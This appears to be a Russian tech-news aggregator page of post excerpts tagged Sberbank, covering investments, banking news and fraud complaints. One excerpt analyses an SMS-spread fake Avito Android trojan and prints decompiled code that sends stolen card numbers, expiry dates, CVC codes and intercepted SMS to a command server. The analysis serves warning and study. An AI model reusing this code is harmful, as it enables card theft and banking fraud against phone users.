Американская инвестиционная компания JPMorgan скупила 4.5% акций Luxoft, в то время как французский фонд BNP Paribas, наоборот, сократил свою долю в два раза. Как это связано с финансовой ситуацией Luxoft?Читать полностью »
Рубрика «Сбербанк» - 38
Продолжается передел акций Luxoft
2015-02-21 в 5:20, admin, рубрики: BNP Paribas, Fidelity, luxoft, radius, Исследования и прогнозы в IT, Сбербанк, финансы в ITФонд Сбербанка и другие инвесторы вложили 6,5 миллионов долларов в финансовый стартап Mobeewave
2015-02-17 в 11:52, admin, рубрики: NFC, венчурные инвестиции, венчурный фонд, инвестиции, Сбербанк, смартфоны, стартапы, Управление продуктом, финансовый стартап, финансы, финансы в ITВенчурный фонд Сбербанка вместе с другими инвесторами вложил в канадскую компанию Mobeewave 6,5 миллионов долларов, сообщает РБК. Технология Mobeewave превращает смартфон с NFC в платежный терминал.
Как вывести Яндекс-деньги на бесплатную карту Сбербанка
2014-10-02 в 17:55, admin, рубрики: пластиковые карты, Сбербанк, сбербанк онлайн, Чулан, яндекс.деньгиUPD 02.10.2014. Этот пост почти два года находился в песочнице. Но нашелся кто-то добрый, кто подарил мне за него инвайт. Значит пригодилось.
Теперь я могу его опубликовать, но предупреждаю, что многое уже поменялось. Многие сервисы уже работают с картами Maestro, больше не требуют только Visa или MasterCard. Банковский перевод с Яндекс-денег стал сложнее, теперь требуется пройти идентификацию.
====
У меня оказалось две тысячи рублей на Яндекс-деньгах. Захотелось их вывести. Цена вопроса соизмерима со стоимостью владения VISA или Mastercard. Платную карту заводить не хотелось.
Ниже я расскажу, как
- получить бесплатную карту Сбербанк-Maestro «Momentum»,
- подключить сбербанк-онлайн,
- перевести Яндекс-деньги на карту.
Разместил я, ничего не подозревая, объявление на avito.ru. Сколько раз туда ходил! Но на этот раз как-то не удалось…
Я давно был уверен, что многие нехорошие люди парсят телефонные номера с этого сайта, так что такси, строительные материалы, скорая компьютерная помощь, «8-800-555-3-555 — проще позвонить, чем у кого-то занимать» и приглашения на битву экстрасенсов для меня уже привычное дело, но на этот раз было нечто новое.
Приходит мне СМС-сообщение с текстом: «Зaинтерсoвaлo вaше oбьявление кaк нaсчет oбменa нa http://…». Прямо вот так, с пропущенным знаком препинания и ошибками. А по ссылке качается avito.apk. Интересно.
Исследование APK
Ну, подумал я, надо бы глянуть, что этот APK делает. Результат привычной для меня связки из apktool + dex2jar + jd-gui меня не удовлетворил, т.к. не было видно часть классов деревом, хотя доступ по ссылкам к ним получить было можно. Решил я воспользоваться новомодными онлайн-sandbox'ами — и декомпилированный код получил, и информацию, и pcap-файл со сдампленным трафиком. Как оказалось, этот файл загружали до меня, поэтому в мои руки попал более ранний анализ, что было достаточно полезно.
Итак, что умеет этот троян:
- delivery&&& — рассылка СМС-сообщений на номера из телефонной книги с заданным текстом
- sent&&& — отправка заданных СМС-сообщений с сервера
- rent&&& — перехват всех СМС-сообщений и отправка их на сервер
- sms_stop&&& — отмена перехвата СМС-сообщений
- ussd&&& — USSD-запрос
- call_1&&& — установка и отмена безусловной переадресации
Немного кода из моих заметок
protected HttpRequestBase a()
{
try
{
HttpPost httppost = new HttpPost(d());
ArrayList arraylist = new ArrayList();
arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(c())));
arraylist.add(new BasicNameValuePair("number", b));
arraylist.add(new BasicNameValuePair("month", Integer.toString(c.intValue())));
arraylist.add(new BasicNameValuePair("year", Integer.toString(d.intValue())));
arraylist.add(new BasicNameValuePair("cvc", Integer.toString(e.intValue())));
httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
return httppost;
}
catch(UnsupportedEncodingException unsupportedencodingexception)
{
unsupportedencodingexception.printStackTrace();
}
return null;
}
protected String d()
{
return new String((new StringBuilder()).append(a).append("set_card.php").toString());
}
protected HttpRequestBase a()
{
try
{
HttpPost httppost = new HttpPost(d());
ArrayList arraylist = new ArrayList();
arraylist.add(new BasicNameValuePair("id", com.avito.a.c.a(b)));
arraylist.add(new BasicNameValuePair("info", com.avito.a.c.b(b)));
httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
return httppost;
}
catch(UnsupportedEncodingException unsupportedencodingexception)
{
unsupportedencodingexception.printStackTrace();
}
return null;
}
protected String d()
{
return new String((new StringBuilder()).append(a).append("get.php").toString());
}
protected HttpRequestBase a()
{
try
{
JSONObject jsonobject = new JSONObject();
jsonobject.put("text", c);
jsonobject.put("number", d);
jsonobject.put("date", e);
HttpPost httppost = new HttpPost(d());
ArrayList arraylist = new ArrayList();
arraylist.add(new BasicNameValuePair("bot_id", com.avito.a.c.a(b)));
arraylist.add(new BasicNameValuePair("sms", jsonobject.toString()));
httppost.setEntity(new UrlEncodedFormEntity(arraylist, "UTF-8"));
return httppost;
}
catch(UnsupportedEncodingException unsupportedencodingexception)
{
unsupportedencodingexception.printStackTrace();
}
catch(JSONException jsonexception)
{
jsonexception.printStackTrace();
}
return null;
}
protected String d()
{
return new String((new StringBuilder()).append(a).append("load_sms.php").toString());
Помимо этих команд, троян отключает Wifi Sleep, пытается получить доступ к зашифрованному хранилищу и установить себя в качестве Android-администратора (естественно, при этом используются стандартные диалоги ОС, где можно отменить данное действие). Код трояна не обфусцирован, некоторые строки закодированы base64. Вообще непонятно, что это за троян такой. То ли его собирали копипастой, то ли он основан на каком-то другом трояне, то ли еще что, но в нем имеются строки на португальском, немецком, английском, Ubuntu-шрифты, форма для перехвата данных из приложения немецкого банка Commerzbank, значок какой-то игры и флеш-плеера.Читать полностью »
Как клиенту Сбербанка и Мегафон неожиданно для себя лишиться честно заработанных денег?
2014-08-19 в 18:30, admin, рубрики: kiwi, Мегафон, мошенничество, СбербанкПодходил к концу очередной длинный рабочий день, среда 13 августа 2014 года выдалась действительно непростая, но в 8 часов вечера я находился уже в полу расслабленном состоянии – оставалось завершить кое-какие мелкие дела и можно идти домой. Гармонию вечера нарушило странное сообщение с сервисного номера оператора Мегафон:
«Внимание, по вашему номеру в Салоне МегаФон запрошена информация. Если Вы не обращались в Салон МегаФон, просьба сообщить об этом, отправив смс с текстом САЛОН на номер 0500 (бесплатно).13/08/2014, 20:05:11».
Владимир Стасевич (Банк XXI, Сбербанк): «Мы должны готовиться и готовимся к следующему этапу эволюции – массовому мобильному банкингу»
2014-07-14 в 11:13, admin, рубрики: mobile development, Блог компании «Apps4All», мобильный банкинг, приложения, разработка, разработчики, Сбербанк, финансовые сервисы, хакатон, метки: хакатон 
26-27 июля в DI Telegraph пройдет Хакатон мобильных финансовых сервисов – первый хакатон Сбербанка. Общий призовой фонд победителей в трех номинациях составит 1 000 000 рублей.
Представляем вашему вниманию интервью об ожиданиях прототипа мобильного финансового сервиса с одним из организаторов Хакатона — Владимиром Стасевичем, руководителем продуктов Сбербанк Онлайн, Банк XXI, Сбербанк.
На собрании Сбербанка Греф выступал в Google Glass и говорил о конкуренции с Google и Amazon
2014-06-09 в 6:18, admin, рубрики: android, Google, Google Glass, банки, конкуренция, прогресс, Сбербанк, Финансы в IT-индустрии, метки: Google, Google Glass, банки, конкуренция, прогресс, Сбербанк На днях состоялось собрание акционеров Сбербанка. в общем-то рядовое финансовое событие, мало касающееся аудитории Хабра, если бы не два но:
— председатель правления Греф вел доклад в Google Glass: «Я не могу весь текст запомнить, поскольку у меня очень большой доклад, там у меня были тезисы. Так я мог смотреть и текст, и аудиторию»
— во время доклада председатель правления говорил о том, что в «в ближайшие годы главными конкурентами банков станут не другие банки, а крупные интернет-ресурсы».
Как Сбербанк распространяет ваши личные данные
2013-09-29 в 18:42, admin, рубрики: 152-фз, информационная безопасность, персональные данные, Сбербанк, метки: 152-фз, персональные данные, Сбербанк Я дал знакомому номер моей карты, чтобы он мог перевести мне деньги.
Знакомый сделал перевод и получил квитанцию.
В его квитанции оказались указаны мои паспортные данные (см. скан квитанции под катом).
Я сообщил о проблеме на странице www.facebook.com/sberbank, получил рекомендацию написать на адрес zabota@sberbank.ru
17 сентября я отправил на этот адрес описание истории и вопрос:
«Сообщите пожалуйста, почему и как в квитанции оказались мои паспортные данные и, таким образом, произошла передача моих персональных данных третьему лицу?»
Прошло почти 2 недели, никакого ответа я так и не получил, поэтому начинаю размещение открытых сообщений.
Я считаю, что важно, чтобы максимальное количество клиентов Сбера узнало о том, как банк относится к их личным данным.
Читать полностью »
Сбербанк — «Один Из Них»!
2013-09-26 в 1:46, admin, рубрики: money, кидалово, Сбербанк, Финансы для всех, Чулан, электронная коммерция, метки: money, кидалово, СбербанкДоброго времени суток, уважаемое читатели.
Существует мнение, что частная информация вкладчика банка – это неприкосновенная ценность. То есть, нечто, чего не может коснуться никто: ни сосед, ни друг, ни враг, ни государство. Отсюда вопрос: какого хрена.
Читать полностью »
Резидент Челнинского ИТ-парка внедряет свои разработки в Сбербанк
2013-08-14 в 20:21, admin, рубрики: бизнес-инкубатор, Блог компании Бизнес-инкубатор казанского «ИТ-Парка», ит-парк, Сбербанк, стартап, метки: бизнес-инкубатор, ит-парк, Сбербанк, стартап9 августа 2013 года в трех отделениях Сбербанка состоялся официальный тестовый запуск новой технологии продвижения онлайн услуг, которую разработал проект-резидент Бизнес-инкубатора Челнинской площадки ИТ-парка — PARTIZAN-info.
